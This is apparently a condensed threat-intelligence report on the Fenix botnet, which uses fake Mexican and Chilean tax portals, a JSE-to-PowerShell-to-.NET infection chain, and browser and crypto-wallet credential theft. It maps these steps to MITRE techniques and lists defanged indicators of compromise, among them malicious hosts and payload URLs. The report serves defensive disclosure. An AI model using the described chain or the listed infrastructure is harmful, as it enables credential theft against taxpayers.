Metabase Q uncovered a LATAM-focused botnet named Fenix that targets taxpayers in Mexico and Chile through fake tax portals to steal credentials. The operation features a multi-stage infection chain, including phishing websites, a JS/JSE downloader, PowerShell and .NET payloads, and credential theft from browsers and crypto wallets. #FenixBotnet #SAT
Keypoints
- Metabase Q identifies a local actor (Mexican developers) behind the Fenix botnet, focused on Mexico and Chile with familiarity with regional government institutions.
- The campaign exploits government tax season events by redirecting victims to fraudulent portals that mimic SAT (Mexico) and SII (Chile) sites to steal credentials.
- The infection chain is multi-stage, starting with fake tax portals, then a ZIP/.url flow to download a JSE, obfuscated code, and a PowerShell/.NET payload executed in memory.
- Fenix uses typosquatting domains, WordPress vulnerabilities, and site cloning (HTTrack) to develop phishing infrastructure and phishing campaigns.
- Credential theft targets browsers (Chrome, Opera, Edge) and crypto wallets via a steal.crypt module.
- Metabase Q’s defense integrates threat intel, crimeware simulation, blue-team hunting, and security validation to improve detection and response.
MITRE Techniques
- [T1566] Phishing – Spearphishing Link – Redirect victims to fraudulent websites that mimic the official portals of the SAT in Mexico and the SII in Chile. “redirect victims to fraudulent websites that mimic the official portals of the Servicio de Administración Tributaria (SAT) in Mexico and the Servicio de Impuestos Internos (SII) in Chile.”
- [T1190] Exploit Public-Facing Application – Compromises weak websites using vulnerable WordPress engines and creates new domains to launch phishing campaigns. “It compromises weak websites using vulnerable WordPress engines and also creates new domains to launch phishing campaigns.”
- [T1105] Ingress Tool Transfer – The JSE file downloads a PowerShell script to disk and executes it. “The JSE file contains obfuscated code to make it more difficult to analyze. After deobfuscating and making the relevant substitutions, the following code downloads a Powershell script to disk and executes it.”
- [T1059.001] PowerShell – The downloaded PowerShell script loads a .NET binary in memory and executes it. “The downloaded PowerShell script loads a .NET binary in memory and executes it.”
- [T1059.007] JavaScript – The infection uses a JSE file to download and run components; the JSE file contains obfuscated code to hide its actions. “The JSE file contains obfuscated code to make it more difficult to analyze.”
- [T1055] Process Injection – The Windows binary AuthHost.exe is started in suspended mode and then a shellcode is injected into it. “The Windows binary AuthHost.exe is started in suspended mode and then a shellcode is injected into it.”
- [T1112] Modify Registry – The malware modifies the registry to set up a proxy for interception of web traffic. “loads a proxy in the registry to intercept web traffic.”
- [T1555.003] Credentials from Web Browsers – The stealer.crypt module grabs credentials from browsers and crypto wallets. “stealer.crypt grabs credentials from different browsers including Chrome, Opera and Edge as well as from crypto wallets.”
- [T1036] Masquerading – Creates typosquatting domains similar to known apps like AnyDesk, WhatsApp, etc. “creates typosquatting domains similar to known apps like AnyDesk, WhatsApp, etc.”
Indicators of Compromise
- [Hashes] context – B10B9F1F286F7AE29D9E87C5391D3653, 500B1C312163009FEFEC3F8FE7861258, and 10 more hashes
- [URL] context – file[:]139[.]162[.]73[.]58@80SuECWRPQSAT_Herramienta_Seguridad[.]jse, hxxps[:]//russiancl[.]top/bramx/7684jasdtg[.]xls
- [Domain] context – 2repuvegobmx[.]com.mx, annydesk.website, and 10 more domains
- [IP Address] context – 207.210.228[.]67, 139.162.73[.]58, and 80.66.64[.]154
- [Filenames] context – SII_Seguro_XXXXXX.zip, Herramienta Seguridad SII.url, and 8 more filenames
Read more: https://www.metabaseq.com/fenix-botnet/